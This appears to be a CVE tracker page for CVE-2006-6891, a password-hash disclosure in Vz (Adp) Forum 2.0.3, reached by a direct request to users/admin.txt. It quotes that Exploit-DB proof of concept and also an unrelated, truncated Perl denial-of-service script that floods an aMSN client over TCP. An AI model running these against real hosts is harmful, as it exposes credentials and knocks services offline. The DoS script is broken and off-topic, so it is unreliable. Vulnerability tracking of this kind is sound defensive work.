CVE-2006-6891
published 2006-12-31CVE-2006-6891: Vz (Adp) Forum 2.0.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the…
PriorityP432medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.23%
80.5th percentile
Vz (Adp) Forum 2.0.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrative account name and password hash via a direct request for users/admin.txt.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vz_forum | vz_forum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vz (Adp) Forum 2.0.3 - Remote Password Disclosure
exploitdb·2006-12-31
CVE-2006-6891 Vz (Adp) Forum 2.0.3 - Remote Password Disclosure
Vz (Adp) Forum 2.0.3 - Remote Password Disclosure
---
##########################################################################################################
#Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerablity
##########################################################################################################
#S.name:ADP Forum
#Affected version:2.0.3
#Download&Demo:http://www.linux.it/~fedro/index.php?pag=scripts&lang=en
#Risk:Very Highly Critical
##########################################################################################################
#Author:Dr Max Virus
#Location:Egypt
##########################################################################################################
#POC:
#http:/[target]/[path]/users/admin.txt
#As We see Admin name and hash !
Exploit-DB
aMSN - Remote Denial of Service
exploitdb·2006-01-01
CVE-2006-0138 aMSN - Remote Denial of Service
aMSN - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/55381/info
aMSN is prone to a remote denial-of-service vulnerability.
A successful exploit of this issue allows remote attackers to crash the affected application, denying service to legitimate users.
#!/usr/bin/perl
use IO::Socket;
$x = 0;
print q(
* AMSN REMOTE DOS XPL *
* BY *
* Red-Point *
* [email protected] *
);
print q(Victim IP: );
$hos = ;
chop ($hos);
print q( );
$type = seC0de;
chop ($type);
if($type == seC0de){
while($x != 9999999){
$postit = "";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$hos",
PeerPort => "6891",
Proto => "tcp",
);
die "\nEl host esta fuera de servicio o no estas conectado a internet $!\n" unless $sock;
print $sock "\x89\x50\x4E\x
2006-12-31
Published